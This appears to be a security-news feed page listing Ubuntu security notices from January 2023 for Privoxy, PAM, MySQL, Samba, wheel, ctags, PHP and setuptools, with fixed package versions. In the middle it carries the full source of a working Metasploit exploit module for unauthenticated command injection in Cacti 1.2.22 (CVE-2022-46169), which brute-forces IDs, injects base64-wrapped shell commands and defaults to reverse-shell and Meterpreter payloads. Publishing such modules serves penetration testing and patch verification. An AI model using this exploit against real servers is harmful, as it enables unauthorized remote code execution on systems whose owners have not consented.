Ubuntu Security Notice 5826-1 - Joshua Rogers discovered that Privoxy incorrectly handled memory allocation. An attacker could possibly use this issue to cause a denial of service. Artem Ivanov discovered that Privoxy incorrectly handled input validations. An attacker could possibly use this issue to perform cross-site scripting attacks.

    ==========================================================================Ubuntu Security Notice USN-5826-1January 25, 2023privoxy vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Privoxy.Software Description:- privoxy: Privacy enhancing HTTP ProxyDetails:Joshua Rogers discovered that Privoxy incorrectly handled memory allocation. Anattacker could possibly use this issue to cause a denial of service. (CVE-2021-44540)Artem Ivanov discovered that Privoxy incorrectly handled input validations. Anattacker could possibly use this issue to perform cross-site scripting (XSS) attacks.(CVE-2021-44543)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   privoxy                         3.0.28-2ubuntu0.2Ubuntu 18.04 LTS:   privoxy                         3.0.26-5ubuntu0.3In general, a standard system update will make all the necessary changes.References:https://ubuntu.com/security/notices/USN-5826-1   CVE-2021-44540, CVE-2021-44543

Ubuntu Security Notice USN-5826-1

Ubuntu Security Notice 5825-1 - It was discovered that PAM did not correctly restrict login from an IP address that is not resolvable via DNS. An attacker could possibly use this issue to bypass authentication.

=========================================================================  
Ubuntu Security Notice USN-5825-1  
January 25, 2023

pam vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

PAM would allow unintended access to the machine over network.

Software Description:  
- pam: Pluggable Authentication Modules

Details:

It was discovered that PAM did not correctly restrict login from an IP  
address that is not resolvable via DNS. An attacker could possibly use this  
issue to bypass authentication.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  libpam-modules                  1.5.2-2ubuntu1.1

Ubuntu 22.04 LTS:  
  libpam-modules                  1.4.0-11ubuntu2.1

Ubuntu 20.04 LTS:  
  libpam-modules                  1.3.1-5ubuntu4.4

Ubuntu 18.04 LTS:  
  libpam-modules                  1.1.8-3.6ubuntu2.18.04.4

Ubuntu 16.04 ESM:  
  libpam-modules                  1.1.8-3.2ubuntu2.3+esm2

Ubuntu 14.04 ESM:  
  libpam-modules                  1.1.8-1ubuntu2.2+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5825-1  
  CVE-2022-28321

Package Information:  
  https://launchpad.net/ubuntu/+source/pam/1.5.2-2ubuntu1.1  
  https://launchpad.net/ubuntu/+source/pam/1.4.0-11ubuntu2.1  
  https://launchpad.net/ubuntu/+source/pam/1.3.1-5ubuntu4.4  
  https://launchpad.net/ubuntu/+source/pam/1.1.8-3.6ubuntu2.18.04.4

Ubuntu Security Notice USN-5825-1

Ubuntu Security Notice 5823-2 - USN-5823-1 fixed a vulnerability in MySQL. This update provides the corresponding update for Ubuntu 16.04 ESM. Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to MySQL 5.7.41.

=========================================================================  
Ubuntu Security Notice USN-5823-2  
January 24, 2023

mysql-5.7 vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in MySQL.

Software Description:  
- mysql-5.7: MySQL database

Details:

USN-5823-1 fixed a vulnerability in MySQL. This update provides  
the corresponding update for Ubuntu 16.04 ESM.

Original advisory details:

 Multiple security issues were discovered in MySQL and this update includes  
 new upstream MySQL versions to fix these issues.

 MySQL has been updated to MySQL 5.7.41.

 In addition to security fixes, the updated packages contain bug fixes, new  
 features, and possibly incompatible changes.

 Please see the following for more information:

 https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.html  
 https://www.oracle.com/security-alerts/cpujan2023.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
  mysql-server-5.7                5.7.41-0ubuntu0.16.04.1+esm1

This update uses a new upstream release, which includes additional bug  
fixes. In general, a standard system update will make all the necessary  
changes.

References:  
  https://ubuntu.com/security/notices/USN-5823-2  
  https://ubuntu.com/security/notices/USN-5823-1  
  CVE-2023-21840

Ubuntu Security Notice USN-5823-2

Ubuntu Security Notice 5823-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.32 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, and Ubuntu 22.10. Ubuntu 18.04 LTS has been updated to MySQL 5.7.41. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

    ==========================================================================Ubuntu Security Notice USN-5823-1January 24, 2023mysql-5.7, mysql-8.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in MySQL.Software Description:- mysql-8.0: MySQL database- mysql-5.7: MySQL databaseDetails:Multiple security issues were discovered in MySQL and this update includesnew upstream MySQL versions to fix these issues.MySQL has been updated to 8.0.32 in Ubuntu 20.04 LTS, Ubuntu 22.04 LTS, andUbuntu 22.10. Ubuntu 18.04 LTS has been updated to MySQL 5.7.41.In addition to security fixes, the updated packages contain bug fixes, newfeatures, and possibly incompatible changes.Please see the following for more information:https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-41.htmlhttps://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-32.htmlhttps://www.oracle.com/security-alerts/cpujan2023.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   mysql-server-8.0                8.0.32-0buntu0.22.10.1Ubuntu 22.04 LTS:   mysql-server-8.0                8.0.32-0buntu0.22.04.1Ubuntu 20.04 LTS:   mysql-server-8.0                8.0.32-0buntu0.20.04.1Ubuntu 18.04 LTS:   mysql-server-5.7                5.7.41-0ubuntu0.18.04.1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:   https://ubuntu.com/security/notices/USN-5823-1   CVE-2022-32221, CVE-2023-21836, CVE-2023-21840, CVE-2023-21863,   CVE-2023-21867, CVE-2023-21868, CVE-2023-21869, CVE-2023-21870,   CVE-2023-21871, CVE-2023-21873, CVE-2023-21875, CVE-2023-21876,   CVE-2023-21877, CVE-2023-21878, CVE-2023-21879, CVE-2023-21880,   CVE-2023-21881, CVE-2023-21882, CVE-2023-21883, CVE-2023-21887Package Information:   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.22.10.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.22.04.1   https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.32-0buntu0.20.04.1   https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.41-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5823-1

This Metasploit module exploits an unauthenticated command injection vulnerability in Cacti versions through 1.2.22 in order to achieve unauthenticated remote code execution as the www-data user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti 1.2.22 unauthenticated command injection',        'Description' => %q{          This module exploits an unauthenticated command injection          vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in          order to achieve unauthenticated remote code execution as the          www-data user.          The module first attempts to obtain the Cacti version to see          if the target is affected. If LOCAL_DATA_ID and/or HOST_ID          are not set, the module will try to bruteforce the missing          value(s). If a valid combination is found, the module will          use these to attempt exploitation. If LOCAL_DATA_ID and/or          HOST_ID are both set, the module will immediately attempt          exploitation.          During exploitation, the module sends a GET request to          /remote_agent.php with the action parameter set to polldata          and the X-Forwarded-For header set to the provided value for          X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the          poller_id parameter is set to the payload and the host_id          and local_data_id parameters are set to the bruteforced or          provided values. If X_FORWARDED_FOR_IP is set to an address          that is resolvable to a hostname in the poller table, and the          local_data_id and host_id values are vulnerable, the payload          set for poller_id will be executed by the target.          This module has been successfully tested against Cacti          version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)        },        'License' => MSF_LICENSE,        'Author' => [          'Stefan Schiller', # discovery (independent of Steven Seeley)          'Steven Seeley', # (mr_me) @steventseeley - discovery (independent of Stefan Schiller)          'Owen Gong', # @phithon_xg - vulhub PoC          'Erik Wynter' # @wyntererik - Metasploit        ],        'References' => [          ['CVE', '2022-46169'],          ['URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf'], # disclosure and technical details          ['URL', 'https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169'], # vulhub vulnerable docker image and PoC          ['URL', 'https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution'] # analysis by Stefan Schiller        ],        'DefaultOptions' => {          'RPORT' => 8080        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Targets' => [          [            'Automatic (Unix In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },              'Type' => :unix_memory            }          ],          [            'Automatic (Linux Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'CmdStagerFlavor' => ['echo', 'printf', 'wget', 'curl'],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ]        ],        'Privileged' => false,        'DisclosureDate' => '2022-12-05',        'DefaultTarget' => 1,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The base path to Cacti', '/']),      OptString.new('X_FORWARDED_FOR_IP', [true, 'The IP to use in the X-Forwarded-For HTTP header. This should be resolvable to a hostname in the poller table.', '127.0.0.1']),      OptInt.new('HOST_ID', [false, 'The host_id value to use. By default, the module will try to bruteforce this.']),      OptInt.new('LOCAL_DATA_ID', [false, 'The local_data_id value to use. By default, the module will try to bruteforce this.'])    ])    register_advanced_options([      OptInt.new('MIN_HOST_ID', [true, 'Lower value for the range of possible host_id values to check for', 1]),      OptInt.new('MAX_HOST_ID', [true, 'Upper value for the range of possible host_id values to check for', 5]),      OptInt.new('MIN_LOCAL_DATA_ID', [true, 'Lower value for the range of possible local_data_id values to check for', 1]),      OptInt.new('MAX_LOCAL_DATA_ID', [true, 'Upper value for the range of possible local_data_id values to check for', 100])    ])  end  def check    # sanity check to see if the target is likely Cacti    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    unless res      return CheckCode::Unknown('Connection failed.')    end    unless res.code == 200 && res.body.include?('<title>Login to Cacti')      return CheckCode::Safe('Target is not a Cacti application.')    end    # get the version    version = res.body.scan(/Version (.*?) \| \(c\)/)&.flatten&.first    if version.blank?      return CheckCode::Detected('Could not determine the Cacti version: the HTTP response body did not match the expected format.')    end    begin      if Rex::Version.new(version) <= Rex::Version.new('1.2.22')        return CheckCode::Appears("The target is Cacti version #{version}")      else        return CheckCode::Safe("The target is Cacti version #{version}")      end    rescue StandardError => e      return CheckCode::Unknown("Failed to obtain a valid Cacti version: #{e}")    end  end  def exploitable_rrd_names    [      'apache_total_kbytes',      'apache_total_hits',      'apache_total_hits',      'apache_total_kbytes',      'apache_cpuload',      'boost_avg_size',      'boost_peak_memory',      'boost_records',      'boost_table',      'ExportDuration',      'ExportGraphs',      'syslogRuntime',      'tholdRuntime',      'polling_time',      'uptime',    ]  end  def brute_force_ids    # perform a sanity check first    if @host_id      host_ids = [@host_id]    else      if datastore['MAX_HOST_ID'] < datastore['MIN_HOST_ID']        fail_with(Failure::BadConfig, 'The value for MAX_HOST_ID is lower than MIN_HOST_ID. This is impossible')      end      host_ids = (datastore['MIN_HOST_ID']..datastore['MAX_HOST_ID']).to_a    end    if @local_data_id      local_data_ids = [@local_data_ids]    else      if datastore['MAX_LOCAL_DATA_ID'] < datastore['MIN_LOCAL_DATA_ID']        fail_with(Failure::BadConfig, 'The value for MAX_LOCAL_DATA_ID is lower than MIN_LOCAL_DATA_ID. This is impossible')      end      local_data_ids = (datastore['MIN_LOCAL_DATA_ID']..datastore['MAX_LOCAL_DATA_ID']).to_a    end    # lets make sure the module never performs more than 1,000 possible requests to try and bruteforce host_id and local_data_id    max_attempts = host_ids.length * local_data_ids.length    if max_attempts > 1000      fail_with(Failure::BadConfig, 'The number of possible HOST_ID and LOCAL_DATA_ID combinations exceeds 1000. Please limit this number by adjusting the MIN and MAX options for both parameters.')    end    potential_targets = []    request_ct = 0    print_status("Trying to bruteforce an exploitable host_id and local_data_id by trying up to #{max_attempts} combinations")    host_ids.each do |h_id|      print_status("Enumerating local_data_id values for host_id #{h_id}")      local_data_ids.each do |ld_id|        request_ct += 1        print_status("Performing request #{request_ct}...") if request_ct % 25 == 0        res = send_request_cgi(remote_agent_request(ld_id, h_id, rand(1..1000)))        unless res          print_error('No response received. Aborting bruteforce')          return nil        end        unless res.code == 200          print_error("Received unexpected response code #{res.code}. This shouldn't happen. Aborting bruteforce")          return nil        end        begin          parsed_response = JSON.parse(res.body)        rescue JSON::ParserError          print_error("The response body is not in valid JSON format. This shouldn't happen. Aborting bruteforce")          return nil        end        unless parsed_response.is_a?(Array)          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")          return nil        end        # the array can be empty, which is not an error but just means the local_data_id is not exploitable        next if parsed_response.empty?        first_item = parsed_response.first        unless first_item.is_a?(Hash) && ['value', 'rrd_name', 'local_data_id'].all? { |key| first_item.keys.include?(key) }          print_error("The response body is not in the expected format. This shouldn't happen. Aborting bruteforce")          return nil        end        # some data source types that can be exploited have a valid rrd_name. these are included in the exploitable_rrd_names array        # if we encounter one of these, we should assume the local_data_id is exploitable and try to exploit it        # in addition, some data source types have an empty rrd_name but are still exploitable        # however, if the rrd_name is blank, the only way to verify if a local_data_id value corresponds to an exploitable data source, is to actually try and exploit it        # instead of trying to exploit all potential targets of the latter category, let's just save these and print them at the end        # then the user can try to exploit them manually by setting the HOST_ID and LOCAL_DATA_ID options        rrd_name = first_item['rrd_name']        if rrd_name.empty?          potential_targets << [h_id, ld_id]        elsif exploitable_rrd_names.include?(rrd_name)          print_good("Found exploitable local_data_id #{ld_id} for host_id #{h_id}")          return [h_id, ld_id]        else          next # if we have a valid rrd_name but it's not in the exploitable_rrd_names array, we should move on        end      end    end    return nil if potential_targets.empty?    # inform the user about potential targets    print_warning("Identified #{potential_targets.length} host_id - local_data_id combination(s) that may be exploitable, but could not be positively identified as such:")    potential_targets.each do |h_id, ld_id|      print_line("\thost_id: #{h_id} - local_data_id: #{ld_id}")    end    print_status('You can try to exploit these by manually configuring the HOST_ID and LOCAL_DATA_ID options')    nil  end  def execute_command(cmd, _opts = {})    # use base64 encoding to get around special char limitations    cmd = "`echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/bash`"    send_request_cgi(remote_agent_request(@local_data_id, @host_id, cmd), 0)  end  def exploit    @host_id = datastore['HOST_ID'] if datastore['HOST_ID'].present?    @local_data_id = datastore['LOCAL_DATA_ID'] if datastore['LOCAL_DATA_ID'].present?    unless @host_id && @local_data_id      brute_force_result = brute_force_ids      unless brute_force_result        fail_with(Failure::NoTarget, 'Failed to identify an exploitable host_id - local_data_id combination.')      end      @host_id, @local_data_id = brute_force_result    end    if target.arch.first == ARCH_CMD      print_status('Executing the payload. This may take a few seconds...')      execute_command(payload.encoded)    else      execute_cmdstager(background: true)    end  end  def remote_agent_request(ld_id, h_id, poller_id)    {      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'remote_agent.php'),      'headers' => {        'X-Forwarded-For' => datastore['X_FORWARDED_FOR_IP']      },      'vars_get' => {        'action' => 'polldata',        'local_data_ids[0]' => ld_id,        'host_id' => h_id,        'poller_id' => poller_id # when bruteforcing, this is a random number, but during exploitation this is the payload      }    }  endend

Cacti 1.2.22 Command Injection

Ubuntu Security Notice 5822-1 - It was discovered that Samba incorrectly handled the bad password count logic. A remote attacker could possibly use this issue to bypass bad passwords lockouts. This issue was only addressed in Ubuntu 22.10. Evgeny Legerov discovered that Samba incorrectly handled buffers in certain GSSAPI routines of Heimdal. A remote attacker could possibly use this issue to cause Samba to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5822-1  
January 24, 2023

samba vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in Samba.

Software Description:  
- samba: SMB/CIFS file, print, and login server for Unix

Details:

It was discovered that Samba incorrectly handled the bad password count  
logic. A remote attacker could possibly use this issue to bypass bad  
passwords lockouts. This issue was only addressed in Ubuntu 22.10.  
(CVE-2021-20251)

Evgeny Legerov discovered that Samba incorrectly handled buffers in  
certain GSSAPI routines of Heimdal. A remote attacker could possibly use  
this issue to cause Samba to crash, resulting in a denial of service.  
(CVE-2022-3437)

Tom Tervoort discovered that Samba incorrectly used weak rc4-hmac Kerberos  
keys. A remote attacker could possibly use this issue to elevate  
privileges. (CVE-2022-37966, CVE-2022-37967)

It was discovered that Samba supported weak RC4/HMAC-MD5 in NetLogon Secure  
Channel. A remote attacker could possibly use this issue to elevate  
privileges. (CVE-2022-38023)

Greg Hudson discovered that Samba incorrectly handled PAC parsing. On  
32-bit systems, a remote attacker could use this issue to escalate  
privileges, or possibly execute arbitrary code. (CVE-2022-42898)

Joseph Sutton discovered that Samba could be forced to issue rc4-hmac  
encrypted Kerberos tickets. A remote attacker could possibly use this issue  
to escalate privileges. This issue only affected Ubuntu 20.04 LTS and  
Ubuntu 22.04 LTS. (CVE-2022-45141)

WARNING: The fixes included in these updates introduce several important  
behavior changes which may cause compatibility problems interacting with  
systems still expecting the former behavior. Please see the following  
upstream advisories for more information:

https://www.samba.org/samba/security/CVE-2022-37966.html  
https://www.samba.org/samba/security/CVE-2022-37967.html  
https://www.samba.org/samba/security/CVE-2022-38023.html

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   samba                           2:4.16.8+dfsg-0ubuntu1

Ubuntu 22.04 LTS:  
   samba                           2:4.15.13+dfsg-0ubuntu1

Ubuntu 20.04 LTS:  
   samba                           2:4.13.17~dfsg-0ubuntu1.20.04.4

This update uses a new upstream release, which includes additional bug  
fixes. In general, a standard system update will make all the necessary  
changes.

References:  
   https://ubuntu.com/security/notices/USN-5822-1  
   CVE-2021-20251, CVE-2022-3437, CVE-2022-37966, CVE-2022-37967,  
   CVE-2022-38023, CVE-2022-42898, CVE-2022-45141

Package Information:  
   https://launchpad.net/ubuntu/+source/samba/2:4.16.8+dfsg-0ubuntu1  
   https://launchpad.net/ubuntu/+source/samba/2:4.15.13+dfsg-0ubuntu1  
   https://launchpad.net/ubuntu/+source/samba/2:4.13.17~dfsg-0ubuntu1.20.04.4

Ubuntu Security Notice USN-5822-1

Ubuntu Security Notice 5821-1 - Sebastian Chnelik discovered that wheel incorrectly handled certain file names when validated against a regex expression. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5821-1  
January 24, 2023

wheel vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 14.04 ESM

Summary:

wheel could be made to crash if it received specially crafted  
input.

Software Description:  
- wheel: built-package format for Python

Details:

Sebastian Chnelik discovered that wheel incorrectly handled  
certain file names when validated against a regex expression.  
An attacker could possibly use this issue to cause a  
denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   python3-wheel                   0.37.1-2ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   python3-wheel                   0.37.1-2ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   python3-wheel                   0.34.2-1ubuntu0.1

Ubuntu 18.04 LTS:  
   python-wheel                    0.30.0-0.2ubuntu0.1  
   python3-wheel                   0.30.0-0.2ubuntu0.1

Ubuntu 14.04 ESM:  
   python-wheel                    0.24.0-1~ubuntu1.1+esm1  
   python3-wheel                   0.24.0-1~ubuntu1.1+esm1

In general, a standard system update will make all the necessary changes.  
If installed, python-pip and python3-pip will also need to be updated.

References:  
   https://ubuntu.com/security/notices/USN-5821-1  
   CVE-2022-40898

Package Information:  
https://launchpad.net/ubuntu/+source/wheel/0.37.1-2ubuntu0.22.10.1  
https://launchpad.net/ubuntu/+source/wheel/0.37.1-2ubuntu0.22.04.1  
   https://launchpad.net/ubuntu/+source/wheel/0.34.2-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/wheel/0.30.0-0.2ubuntu0.1

Ubuntu Security Notice USN-5821-1

Ubuntu Security Notice 5820-1 - Lorenz Hipp discovered a flaw in exuberant-ctags handling of the tag filename command-line argument. A crafted tag filename specified in the command line or in the configuration file could result in arbitrary command execution.

==========================================================================  
Ubuntu Security Notice USN-5820-1  
January 24, 2023

exuberant-ctags vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Exuberant ctags could be make to perform arbitary command execution if run  
with maliciously crafted user input

Software Description:  
- exuberant-ctags: build tag file indexes of source code definitions

Details:

Lorenz Hipp discovered a flaw in exuberant-ctags handling of the tag   
filename command-line argument. A crafted tag filename specified in the   
command line or in the configuration file could result in arbitrary   
command execution.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
exuberant-ctags 1:5.9~svn20110310-16ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
exuberant-ctags 1:5.9~svn20110310-16ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
exuberant-ctags 1:5.9~svn20110310-12ubuntu0.1

Ubuntu 18.04 LTS:  
exuberant-ctags 1:5.9~svn20110310-11ubuntu0.1

Ubuntu 16.04 ESM:  
exuberant-ctags 1:5.9~svn20110310-11ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5820-1  
CVE-2022-4515

Package Information:  
https://launchpad.net/ubuntu/+source/exuberant-ctags/1:5.9~svn20110310-16ubuntu0.22.10.1  
https://launchpad.net/ubuntu/+source/exuberant-ctags/1:5.9~svn20110310-16ubuntu0.22.04.1  
https://launchpad.net/ubuntu/+source/exuberant-ctags/1:5.9~svn20110310-12ubuntu0.1  
https://launchpad.net/ubuntu/+source/exuberant-ctags/1:5.9~svn20110310-11ubuntu0.1

Ubuntu Security Notice USN-5820-1

Ubuntu Security Notice 5818-1 - It was discovered that PHP incorrectly handled certain inputs. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5818-1  
January 23, 2023

php7.2, php7.4, php8.1 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

PHP could be made do crash or execute arbitrary code if it received  
a specially crafted input.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter  
- php7.2: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a crash or  
execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  libapache2-mod-php7.4           8.1.7-1ubuntu3.2  
  libapache2-mod-php8.0           8.1.7-1ubuntu3.2  
  libapache2-mod-php8.1           8.1.7-1ubuntu3.2  
  php8.1                          8.1.7-1ubuntu3.2  
  php8.1-cgi                      8.1.7-1ubuntu3.2  
  php8.1-cli                      8.1.7-1ubuntu3.2  
  php8.1-sqlite3                  8.1.7-1ubuntu3.2

Ubuntu 22.04 LTS:  
  libapache2-mod-php7.4           8.1.2-1ubuntu2.10  
  libapache2-mod-php8.0           8.1.2-1ubuntu2.10  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.10  
  php8.1                          8.1.2-1ubuntu2.10  
  php8.1-cgi                      8.1.2-1ubuntu2.10  
  php8.1-cli                      8.1.2-1ubuntu2.10  
  php8.1-sqlite3                  8.1.2-1ubuntu2.10

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.17  
  php7.4                          7.4.3-4ubuntu2.17  
  php7.4-cgi                      7.4.3-4ubuntu2.17  
  php7.4-cli                      7.4.3-4ubuntu2.17  
  php7.4-sqlite3                  7.4.3-4ubuntu2.17

Ubuntu 18.04 LTS:  
  libapache2-mod-php7.2           7.2.24-0ubuntu0.18.04.16  
  php7.2                          7.2.24-0ubuntu0.18.04.16  
  php7.2-cgi                      7.2.24-0ubuntu0.18.04.16  
  php7.2-cli                      7.2.24-0ubuntu0.18.04.16  
  php7.2-sqlite3                  7.2.24-0ubuntu0.18.04.16

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5818-1  
  CVE-2022-31631

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.10  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.17  
  https://launchpad.net/ubuntu/+source/php7.2/7.2.24-0ubuntu0.18.04.16

Ubuntu Security Notice USN-5818-1

Ubuntu Security Notice 5817-1 - Sebastian Chnelik discovered that setuptools incorrectly handled certain regex inputs. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5817-1  
January 23, 2023

python-setuptools, setuptools vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Setuptools could be made to crash if it received specially crafted input.

Software Description:  
- python-setuptools: Python Distutils Enhancements  
- setuptools: Python Distutils Enhancements

Details:

Sebastian Chnelik discovered that setuptools incorrectly handled  
certain regex inputs. An attacker could possibly use this issue  
to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   pypy-setuptools                 44.1.1-1.2ubuntu0.22.10.1  
   python-setuptools               44.1.1-1.2ubuntu0.22.10.1  
   python3-setuptools              59.6.0-1.2ubuntu0.22.10.1

Ubuntu 22.04 LTS:  
   pypy-setuptools                 44.1.1-1.2ubuntu0.22.04.1  
   python-setuptools               44.1.1-1.2ubuntu0.22.04.1  
   python3-setuptools              59.6.0-1.2ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
   pypy-setuptools                 44.0.0-2ubuntu0.1  
   python-setuptools               44.0.0-2ubuntu0.1  
   python3-setuptools              45.2.0-1ubuntu0.1

Ubuntu 18.04 LTS:  
   pypy-setuptools                 39.0.1-2ubuntu0.1  
   python-setuptools               39.0.1-2ubuntu0.1  
   python3-setuptools              39.0.1-2ubuntu0.1

Ubuntu 16.04 ESM:  
   pypy-setuptools                 20.7.0-1ubuntu0.1~esm1  
   python-setuptools               20.7.0-1ubuntu0.1~esm1  
   python3-setuptools              20.7.0-1ubuntu0.1~esm1

Ubuntu 14.04 ESM:  
   python-setuptools               3.3-1ubuntu2+esm1  
   python3-setuptools              3.3-1ubuntu2+esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5817-1  
   CVE-2022-40897

Package Information:  
https://launchpad.net/ubuntu/+source/python-setuptools/44.1.1-1.2ubuntu0.22.10.1  
https://launchpad.net/ubuntu/+source/setuptools/59.6.0-1.2ubuntu0.22.10.1  
https://launchpad.net/ubuntu/+source/python-setuptools/44.1.1-1.2ubuntu0.22.04.1  
https://launchpad.net/ubuntu/+source/setuptools/59.6.0-1.2ubuntu0.22.04.1  
https://launchpad.net/ubuntu/+source/python-setuptools/44.0.0-2ubuntu0.1  
https://launchpad.net/ubuntu/+source/setuptools/45.2.0-1ubuntu0.1  
https://launchpad.net/ubuntu/+source/python-setuptools/39.0.1-2ubuntu0.1

Tag

#ubuntu